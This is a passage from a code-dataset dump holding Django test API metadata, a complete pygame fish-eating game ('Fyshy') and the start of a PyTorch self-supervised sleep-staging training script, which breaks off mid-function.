"test_app.models.EmptyConfiguration.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 38, "usage_type": "argument"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 39, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 39, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 42, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", 
"line_number": 45, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 45, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 48, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 48, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 51, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 51, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 52, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 55, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 58, "usage_type": "argument"}, {"api_name": "configuration.models.Configuration.objects.get", "line_number": 59, "usage_type": "call"}, {"api_name": "configuration.models.Configuration.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "configuration.models.Configuration", "line_number": 59, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 61, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 61, "usage_type": "name"}, {"api_name": "configuration.models.Configuration.objects.get", "line_number": 62, "usage_type": "call"}, {"api_name": "configuration.models.Configuration.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "configuration.models.Configuration", "line_number": 62, "usage_type": "name"}, {"api_name": "configuration.models.Configuration.objects.get", "line_number": 63, "usage_type": "call"}, {"api_name": "configuration.models.Configuration.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "configuration.models.Configuration", "line_number": 63, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 66, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationAdmin", "line_number": 68, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 68, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 68, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 73, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationParentAdmin", "line_number": 75, "usage_type": "call"}, {"api_name": "configuration.models.Configuration", "line_number": 75, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 75, 
"usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationParentAdmin", "line_number": 80, "usage_type": "call"}, {"api_name": "configuration.models.Configuration", "line_number": 80, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 80, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 80, "usage_type": "name"}, {"api_name": "test_app.models.SubChildConfiguration", "line_number": 83, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationAdmin", "line_number": 83, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 84, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationAdmin", "line_number": 84, "usage_type": "name"}, {"api_name": "test_app.models.AdminStringConfiguration", "line_number": 85, "usage_type": "name"}, {"api_name": "test_app.models.CustomAdmin", "line_number": 85, "usage_type": "name"}, {"api_name": "test_app.models.AdminModelConfiguration", "line_number": 86, "usage_type": "name"}, {"api_name": "test_app.models.CustomAdmin", "line_number": 86, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 90, "usage_type": "name"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 93, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 97, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 102, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 107, "usage_type": "call"}, {"api_name": "configuration.templatetags.configuration.get_configuration", "line_number": 110, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 111, "usage_type": "argument"}]} +{"seq_id": "284193103", "text": "import itertools as it\nimport os\nimport random\nimport sys\n\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = 'hide'\n\nimport pygame\n\nWINDOW_WIDTH = 640\nWINDOW_HEIGHT = 480\n\nSCORE_HEIGHT_OFFSET = 32\nSCORE_FONT_SIZE = 24\nEND_SPLASH_FONT_SIZE = 36\nEND_SPLASH_PLAYER_OFFSET = 100\n\nWIN_FLASHES = 5\nWIN_FLASH_DURATION = 500 # ms\nLOSE_SCREEN_DURATION = 2000 # ms\n\nFPS = 30\n\nBLACK = (0, 0, 0)\nXKCD_CRIMSON = (140, 0, 15)\nXKCD_BABY_BLUE = (162, 207, 254)\nXKCD_CERULEAN = (4, 133, 209)\nBG_COLOR = XKCD_BABY_BLUE\nINVERT_BG_COLOR = XKCD_CERULEAN\nLOSE_SCREEN_COLOR = XKCD_CRIMSON\n\nIWH_PALETTE_0 = (202, 82, 89)\nIWH_PALETTE_1 = (201, 126, 62)\nIWH_PALETTE_2 = (152, 150, 62)\nIWH_PALETTE_3 = (103, 178, 70)\nIWH_PALETTE_4 = ( 79, 166, 124)\nIWH_PALETTE_5 = ( 86, 167, 216)\nIWH_PALETTE_6 = (117, 120, 196)\nIWH_PALETTE_7 = (143, 97, 210)\n\nFISH_COLOR_0 = IWH_PALETTE_1\nFISH_COLOR_1 = IWH_PALETTE_1\nFISH_COLOR_2 = IWH_PALETTE_3\nFISH_COLOR_3 = IWH_PALETTE_3\nFISH_COLOR_4 = IWH_PALETTE_5\nFISH_COLOR_5 = IWH_PALETTE_5\nFISH_COLOR_6 = IWH_PALETTE_7\nFISH_COLOR_7 = IWH_PALETTE_7\n\nKEY_DX2DY2 = {pygame.K_UP: (0, -1),\n pygame.K_DOWN: (0, 1),\n pygame.K_LEFT: (-1, 0),\n pygame.K_RIGHT: (1, 0)}\n\rLEFT = -1\nRIGHT = 1\r\r\n# gameplay constant parameters\n\nINITIAL_DIRECTION = LEFT\nINITIAL_X = WINDOW_WIDTH // 2\nINITIAL_Y = WINDOW_HEIGHT // 2\n\nPLAYER_MAX_SPEED = 3\nPLAYER_ACCELERATION = 1.5\nPLAYER_SPEED_EPSILON = 0.2\nENEMY_SPEED_RANGE = (2, 5)\n\nMAX_ENEMY_FISH = 16\nALLOWED_OVERLAP = 0.8\nENEMY_SIZES_COLORS = ((0.25, FISH_COLOR_0),\n (0.5, FISH_COLOR_1),\n (0.75, FISH_COLOR_2),\n (1.25, 
FISH_COLOR_3),\n (1.75, FISH_COLOR_4),\n (2.25, FISH_COLOR_5),\n (3.25, FISH_COLOR_6),\n (4.5, FISH_COLOR_7))\nSIZE_UP_THRESHOLDS = {4: 1.5, 8: 2, 16: 3, 32: 4}\nBASE_SCORE = 100\nWIN_SIZE = 32\n\n# icons\n\nWINDOW_ICON_IMG = 'imgs/fish_window_icon.png'\nPLAYER_FISH_IMG = 'imgs/fish.png'\nPLAYER_FISH_WIGGLE_IMG = 'imgs/fish_tail_wiggle.png'\nPLAYER_FISH_EAT_IMGS = ['imgs/fish_chomp_1.png',\n 'imgs/fish_chomp_2.png',\n 'imgs/fish_chomp_3.png',\n 'imgs/fish_chomp_2.png',\n 'imgs/fish_chomp_1.png']\nENEMY_FISH_IMG = 'imgs/enemy_fish_white.png'\nENEMY_FISH_WIGGLE_IMG = 'imgs/enemy_fish_tail_wiggle_white.png'\nDEAD_FISH_IMG = 'imgs/fish_dead.png'\n\nENEMY_FRAME_STRETCH = 3\n\nclass Fish:\n def __init__(self,\n icons,\n eat_frames,\n x=INITIAL_X,\n y=INITIAL_Y,\n direction=INITIAL_DIRECTION,\n max_speed=PLAYER_MAX_SPEED,\n acceleration=PLAYER_ACCELERATION):\n self.direction = direction\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n self.acceleration = acceleration\n self.base_icons = icons\n self.base_eat_frames = eat_frames\n self.base_width, self.base_height = icons[0].get_rect().size\n self.set_icons(icons, eat_frames)\n self.max_speed = max_speed\n self.impulses = {key: False for key in KEY_DX2DY2}\n self.fish_eaten = 0\n self.score = 0\n self.eat_animation = None\r\n\n def set_icons(self, swim, eat):\n flip_swim = [pygame.transform.flip(icon, True, False) for icon in swim]\n flip_eat = [pygame.transform.flip(icon, True, False) for icon in eat]\n self.icons = swim if self.direction == LEFT else flip_swim\n self.flipped_icons = flip_swim if self.direction == LEFT else swim\n self.eat_frames = eat if self.direction == LEFT else flip_eat\n self.flipped_eat_frames = flip_eat if self.direction == LEFT else eat\n self.width, self.height = swim[0].get_rect().size\n self.half_width = self.width // 2\n self.half_height = self.height // 2\n self.curr_icon_idx = 0\r\r @property\n def tail_x(self):\n return self.x - (self.half_width * self.direction)\n\n @property\n def curr_icon(self):\n if self.eat_animation is None:\n return self.icons[self.curr_icon_idx]\n else:\n return self.eat_frames[self.eat_animation]\r\r\n @property\n def top_left(self):\n return (round(self.x - self.half_width),\n round(self.y - self.half_height))\n\n @property\n def hitbox(self):\n return (self.x - self.half_width * ALLOWED_OVERLAP,\n self.x + self.half_width * ALLOWED_OVERLAP,\n self.y - self.half_height * ALLOWED_OVERLAP,\n self.y + self.half_height * ALLOWED_OVERLAP)\r\r\n def update_location(self):\n dx2 = sum(KEY_DX2DY2[key][0] * self.acceleration\n for key, pressed in self.impulses.items() if pressed)\n dy2 = sum(KEY_DX2DY2[key][1] * self.acceleration\n for key, pressed in self.impulses.items() if pressed)\n drag_x = self.dx * abs(self.dx) / 30\n drag_y = self.dy * abs(self.dy) / 30\n self.dx = max(min((self.dx + dx2 - drag_x), self.max_speed),\n -self.max_speed)\n if abs(self.dx) < PLAYER_SPEED_EPSILON:\n self.dx = 0\n self.dy = max(min((self.dy + dy2 - drag_y), self.max_speed),\n -self.max_speed)\n if abs(self.dy) < PLAYER_SPEED_EPSILON:\n self.dy = 0\n self.x = max(min((self.x + self.dx), WINDOW_WIDTH), 0)\n self.y = max(min((self.y + self.dy), WINDOW_HEIGHT), 0)\n if ((dx2 > 0 and self.direction == LEFT) or\n (dx2 < 0 and self.direction == RIGHT)):\n self.direction = LEFT if self.direction == RIGHT else RIGHT\n self.icons, self.flipped_icons = self.flipped_icons, self.icons\n self.eat_frames, self.flipped_eat_frames = (self.flipped_eat_frames,\n self.eat_frames)\n if dx2:\n self.curr_icon_idx = 
(self.curr_icon_idx + 1) % len(self.icons)\n if self.eat_animation is not None:\n self.eat_animation += 1\n if self.eat_animation == len(self.eat_frames):\n self.eat_animation = None\n\n def eat(self, fish):\n self.fish_eaten += 1\n self.score += fish.score\n self.eat_animation = 0\n if self.fish_eaten in SIZE_UP_THRESHOLDS:\n size_up_proportion = SIZE_UP_THRESHOLDS[self.fish_eaten]\n new_width = int(self.base_width * size_up_proportion)\n new_height = int(self.base_height * size_up_proportion)\n new_dims = (new_width, new_height)\n new_icons = [pygame.transform.smoothscale(icon, new_dims)\n for icon in self.base_icons]\n new_eat_frames = [pygame.transform.smoothscale(icon, new_dims)\n for icon in self.base_eat_frames]\n self.set_icons(new_icons, new_eat_frames)\n\rclass EnemyFish(Fish):\n def __init__(self, icons, eat_frames, x, y, direction, max_speed, size):\n icons = list(it.chain.from_iterable(it.repeat(icon, ENEMY_FRAME_STRETCH)\n for icon in icons))\n super().__init__(icons, [], x, y, direction, max_speed)\n self.size = size\n self.score = size * BASE_SCORE\n self.curr_frame_idx = random.randrange(len(icons))\n\n def update_location(self):\n self.x = self.x + self.direction * self.max_speed\n self.curr_icon_idx = (self.curr_icon_idx + 1) % len(self.icons)\n\rdef overlap(first, second):\n return (first[0] <= second[1] and first[1] >= second[0])\r\r\ndef hitbox_overlap(first, second):\n first_left, first_right, first_bottom, first_top = first.hitbox\n second_left, second_right, second_bottom, second_top = second.hitbox\n return (overlap((first_left, first_right), (second_left, second_right)) and\n overlap((first_bottom, first_top), (second_bottom, second_top)))\n\rdef overlap_edges(fish):\n return ((fish.direction == LEFT and fish.tail_x <= 0) or\n (fish.direction == RIGHT and fish.tail_x >= WINDOW_WIDTH))\r\r\ndef handle_collisions(player_fish, other_fish):\n to_remove = []\n for fish_idx, fish in enumerate(other_fish):\n if hitbox_overlap(player_fish, fish):\n if fish.width >= player_fish.width:\n return False\n else:\n to_remove.append(fish_idx)\n player_fish.eat(fish)\n elif overlap_edges(fish):\n to_remove.append(fish_idx)\n for fish_idx in reversed(to_remove):\n other_fish.pop(fish_idx)\n return True\n\rdef draw_pond(display_surface, player_fish, other_fish):\n display_surface.fill(BG_COLOR)\n max_x = display_surface.get_width()\n for fish in other_fish + [player_fish]:\n display_surface.blit(fish.curr_icon, fish.top_left)\n\ndef draw_score(display_surface, player_fish):\n font = pygame.font.Font(None, SCORE_FONT_SIZE)\n text_surface = font.render(str(int(player_fish.score)), True, BLACK)\n loc = (display_surface.get_width() // 2, SCORE_HEIGHT_OFFSET)\n display_surface.blit(text_surface, text_surface.get_rect(center=loc))\n\rdef win_screen(display_surface, player_fish):\n curr_color, next_color = BG_COLOR, INVERT_BG_COLOR\n for _ in range(WIN_FLASHES):\n curr_color, next_color = next_color, curr_color\n display_surface.fill(curr_color)\n player_fish.x = display_surface.get_width() // 2\n player_fish.y = (display_surface.get_height() // 2 -\n END_SPLASH_PLAYER_OFFSET)\n display_surface.blit(player_fish.curr_icon, player_fish.top_left)\n font = pygame.font.Font(None, END_SPLASH_FONT_SIZE)\n text_surface = font.render('You won!', True, next_color)\n loc = (display_surface.get_width() // 2,\n display_surface.get_height() // 2)\n display_surface.blit(text_surface, text_surface.get_rect(center=loc))\n pygame.display.update()\n pygame.time.wait(WIN_FLASH_DURATION)\n\ndef 
lose_screen(display_surface):\n display_surface.fill(LOSE_SCREEN_COLOR)\n x = display_surface.get_width() // 2\n y = display_surface.get_height() // 2 - END_SPLASH_PLAYER_OFFSET\n dead_fish = Fish([pygame.image.load(DEAD_FISH_IMG)], [], x, y)\n display_surface.blit(dead_fish.curr_icon, dead_fish.top_left)\n font = pygame.font.Font(None, END_SPLASH_FONT_SIZE)\n text_surface = font.render('You got eaten', True, BLACK)\n loc = (display_surface.get_width() // 2, display_surface.get_height() // 2)\n display_surface.blit(text_surface, text_surface.get_rect(center=loc))\n pygame.display.update()\n pygame.time.wait(LOSE_SCREEN_DURATION)\n\ndef spawn_enemy_fish(prototypes):\n size, color = random.choice(ENEMY_SIZES_COLORS)\n width, height = (int(size * dim) for dim in prototypes[0].get_rect().size)\n direction = random.choice((LEFT, RIGHT))\n x = WINDOW_WIDTH if direction == LEFT else 0\n x -= direction * width // 2\n y = random.randrange(WINDOW_HEIGHT)\n speed = random.uniform(*ENEMY_SPEED_RANGE)\n icons = [icon.copy() for icon in prototypes]\n for icon in icons:\n icon.fill(color, special_flags=pygame.BLEND_MULT)\n icons = [pygame.transform.smoothscale(icon, (width, height))\n for icon in icons]\n return EnemyFish(icons, [], x, y, direction, speed, size)\n\ndef repopulate_enemy_fish(enemy_fish, prototypes, count=MAX_ENEMY_FISH):\n return (enemy_fish + [spawn_enemy_fish(prototypes)\n for _ in range(len(enemy_fish), count)])\n\ndef main():\n pygame.init()\n display_surface = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n pygame.display.set_icon(pygame.image.load(WINDOW_ICON_IMG))\n player_prototypes = [pygame.image.load(PLAYER_FISH_IMG),\n pygame.image.load(PLAYER_FISH_WIGGLE_IMG)]\n player_eating = [pygame.image.load(file) for file in PLAYER_FISH_EAT_IMGS]\n enemy_prototypes = [pygame.image.load(ENEMY_FISH_IMG),\n pygame.image.load(ENEMY_FISH_WIGGLE_IMG)]\n player_fish = Fish(player_prototypes, player_eating)\n enemy_fish = repopulate_enemy_fish([], enemy_prototypes)\n pygame.display.set_caption('Fyshy')\n frame_clock = pygame.time.Clock()\n while True:\n if player_fish.fish_eaten >= WIN_SIZE:\n win_screen(display_surface, player_fish)\n player_fish = Fish(player_prototypes, player_eating)\n enemy_fish = repopulate_enemy_fish([], enemy_prototypes)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key in KEY_DX2DY2:\n player_fish.impulses[event.key] = True\n elif event.type == pygame.KEYUP:\n if event.key in KEY_DX2DY2:\n player_fish.impulses[event.key] = False\n for fish in enemy_fish + [player_fish]:\n fish.update_location()\n survived = handle_collisions(player_fish, enemy_fish)\n if not survived:\n lose_screen(display_surface)\n player_fish = Fish(player_prototypes, player_eating)\n enemy_fish = []\n enemy_fish = repopulate_enemy_fish(enemy_fish, enemy_prototypes)\n draw_pond(display_surface, player_fish, enemy_fish)\n draw_score(display_surface, player_fish)\n pygame.display.update()\n frame_clock.tick(FPS)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "fyshy.py", "file_name": "fyshy.py", "file_ext": "py", "file_size_in_byte": 13528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 51, "usage_type": "attribute"}, {"api_name": 
"pygame.K_LEFT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 125, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 126, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 198, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 200, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 200, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 206, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 206, "usage_type": "attribute"}, {"api_name": "itertools.repeat", "line_number": 206, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 211, "usage_type": "call"}, {"api_name": "pygame.font.Font", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 266, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 266, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 271, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pygame.time.wait", "line_number": 272, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 272, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 278, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 278, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 280, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 280, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 284, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 284, "usage_type": "attribute"}, {"api_name": "pygame.time.wait", "line_number": 285, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 285, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 288, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 290, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 293, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 294, "usage_type": "call"}, {"api_name": "pygame.BLEND_MULT", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 298, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 298, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 307, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 308, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 308, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 309, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 309, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 310, "usage_type": "call"}, {"api_name": 
"pygame.image", "line_number": 310, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 311, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 311, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 312, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 312, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 313, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 313, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 314, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 317, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 317, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 318, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 318, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 324, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 324, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 325, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 326, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 327, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 331, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 344, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 344, "usage_type": "attribute"}]} +{"seq_id": "501510962", "text": "\"\"\"\n@Time : 2021/5/15 16:01\n@Author : Xiao Qinfeng\n@Email : qfxiao@bjtu.edu.cn\n@File : main_cosleep.py\n@Software: PyCharm\n@Desc : \n\"\"\"\nimport argparse\nimport copy\nimport os\nimport pickle\nimport random\nimport shutil\nimport sys\nimport warnings\nfrom datetime import datetime\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as TF\nimport wandb\nfrom sklearn.model_selection import KFold\nfrom torch.utils.data import DataLoader, SubsetRandomSampler\nfrom tqdm.std import tqdm\n\nfrom cosleep.data import SleepDataset, SleepDatasetImg, TwoDataset\nfrom cosleep.model import CoSleep, DPCFusionClassifier\nfrom cosleep.utils import get_performance, logits_accuracy, mask_accuracy, MultiNCELoss\n\n\ndef setup_seed(seed):\n warnings.warn(f'You have chosen to seed ({seed}) training. This will turn on the CUDNN deterministic setting, '\n f'which can slow down your training considerably! 
You may see unexpected behavior when restarting '\n f'from checkpoints.')\n\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef parse_args(verbose=True):\n parser = argparse.ArgumentParser()\n\n # Dataset & saving & loading\n parser.add_argument('--data-name', type=str, default='sleepedf', choices=['sleepedf', 'isruc'])\n parser.add_argument('--data-path-v1', type=str, required=True)\n parser.add_argument('--data-path-v2', type=str, required=True)\n parser.add_argument('--load-path-v1', type=str, required=True)\n parser.add_argument('--load-path-v2', type=str, required=True)\n parser.add_argument('--channels-v1', type=int, default=2)\n parser.add_argument('--channels-v2', type=int, default=6)\n parser.add_argument('--time-len-v1', type=int, default=3000)\n parser.add_argument('--time-len-v2', type=int, default=30)\n parser.add_argument('--freq-len-v1', type=int, default=None)\n parser.add_argument('--freq-len-v2', type=int, default=100)\n parser.add_argument('--num-epoch', type=int, default=10, help='The number of epochs in a sequence')\n parser.add_argument('--pred-steps', type=int, default=5)\n parser.add_argument('--save-path', type=str, default='cache/tmp')\n parser.add_argument('--save-interval', type=int, default=10)\n parser.add_argument('--classes', type=int, default=5)\n parser.add_argument('--preprocessing', choices=['none', 'quantile', 'standard'], default='standard')\n\n # Model\n parser.add_argument('--network', type=str, default='r1d', choices=['r1d', 'r2d'])\n parser.add_argument('--second-network', type=str, default='r2d', choices=['r1d', 'r2d'])\n parser.add_argument('--feature-dim', type=int, default=128)\n\n # Training\n parser.add_argument('--resume', action='store_true')\n parser.add_argument('--devices', type=int, nargs='+', default=None)\n parser.add_argument('--fold', type=int, default=0)\n parser.add_argument('--kfold', type=int, default=10)\n parser.add_argument('--iter', dest='iteration', type=int, default=5)\n parser.add_argument('--pretrain-epochs', type=int, default=10)\n parser.add_argument('--finetune-epochs', type=int, default=10)\n parser.add_argument('--finetune-ratio', type=float, default=0.1)\n parser.add_argument('--finetune-mode', type=str, default='freeze', choices=['freeze', 'smaller', 'all'])\n parser.add_argument('--cos', action='store_true', help='use cosine lr schedule')\n parser.add_argument('--lr-schedule', type=int, nargs='*', default=[120, 160])\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--num-workers', type=int, default=4)\n\n # Optimization\n parser.add_argument('--optimizer', type=str, default='adamw', choices=['sgd', 'adam', 'adamw'])\n parser.add_argument('--lr', type=float, default=1e-3)\n parser.add_argument('--wd', type=float, default=1e-3)\n parser.add_argument('--momentum', type=float, default=0.9, help='Only valid for SGD optimizer')\n\n parser.add_argument('--mem-k', default=2048, type=int,\n help='queue size; number of negative keys (default: 65536)')\n parser.add_argument('--mem-m', default=0.999, type=float,\n help='moco momentum of updating key encoder (default: 0.999)')\n parser.add_argument('--temperature', type=float, default=0.07)\n parser.add_argument('--iteration', type=int, default=5)\n parser.add_argument('--lam', type=float, default=0.1)\n parser.add_argument('--dynamic-lam', action='store_true')\n parser.add_argument('--lower-bound', type=float, default=0.1)\n 
parser.add_argument('--upper-bound', type=float, default=0.9)\n parser.add_argument('--single-view', action='store_true')\n parser.add_argument('--num-prop', type=int, default=5)\n\n # Misc\n parser.add_argument('--tensorboard', action='store_true')\n parser.add_argument('--disp-interval', type=int, default=20)\n parser.add_argument('--wandb', action='store_true')\n parser.add_argument('--seed', type=int, default=None)\n\n args_parsed = parser.parse_args()\n\n if verbose:\n message = ''\n message += '-------------------------------- Args ------------------------------\\n'\n for k, v in sorted(vars(args_parsed).items()):\n comment = ''\n default = parser.get_default(k)\n if v != default:\n comment = '\\t[default: %s]' % str(default)\n message += '{:>35}: {:<30}{}\\n'.format(str(k), str(v), comment)\n message += '-------------------------------- End ----------------------------------'\n print(message)\n\n return args_parsed\n\n\ndef pretrain(model, train_dataset_v1, train_dataset_v2, device, run_id, it, args):\n if args.optimizer == 'sgd':\n optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=args.wd, momentum=args.momentum)\n elif args.optimizer == 'adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n elif args.optimizer == 'adamw':\n optimizer = optim.AdamW(model.parameters(), weight_decay=args.wd, lr=args.lr)\n else:\n raise ValueError('Invalid optimizer!')\n\n assert len(train_dataset_v1) == len(train_dataset_v2), f'{len(train_dataset_v1)} - {len(train_dataset_v2)}'\n dataset = TwoDataset(train_dataset_v1, train_dataset_v2)\n\n data_loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=args.num_workers,\n shuffle=True, pin_memory=True, drop_last=True)\n\n criterion = MultiNCELoss(reduction='mean').cuda(device)\n\n if args.dynamic_lam:\n assert args.lam <= 0.5\n\n model.train()\n for epoch in range(args.pretrain_epochs):\n losses = []\n accuracies = []\n\n if args.dynamic_lam:\n model.lam = args.lam + epoch / args.pretrain_epochs * (0.5 - args.lam)\n\n with tqdm(data_loader, desc=f'EPOCH [{epoch + 1}/{args.pretrain_epochs}]',\n total=len(train_dataset_v1) // args.batch_size) as progress_bar:\n for x, _, idx1, f, __, idx2 in progress_bar:\n assert (idx1 == idx2).all()\n x = x.cuda(device, non_blocking=True)\n f = f.cuda(device, non_blocking=True)\n idx = idx1.cuda(device, non_blocking=True)\n\n logits, targets = model(x, f, idx)\n\n loss = criterion(logits, targets)\n\n acc = mask_accuracy(logits, targets, topk=(1,))[0]\n accuracies.append(acc)\n\n # if random.random() < 0.9:\n # # because model has been pretrained with infoNCE,\n # # in this stage, self-similarity is already very high,\n # # randomly mask out the self-similarity for optimization efficiency,\n # targets_clone = targets.clone()\n # targets_sum = targets.sum(-1)\n # targets_clone[targets_sum != 1, 0] = 0 # 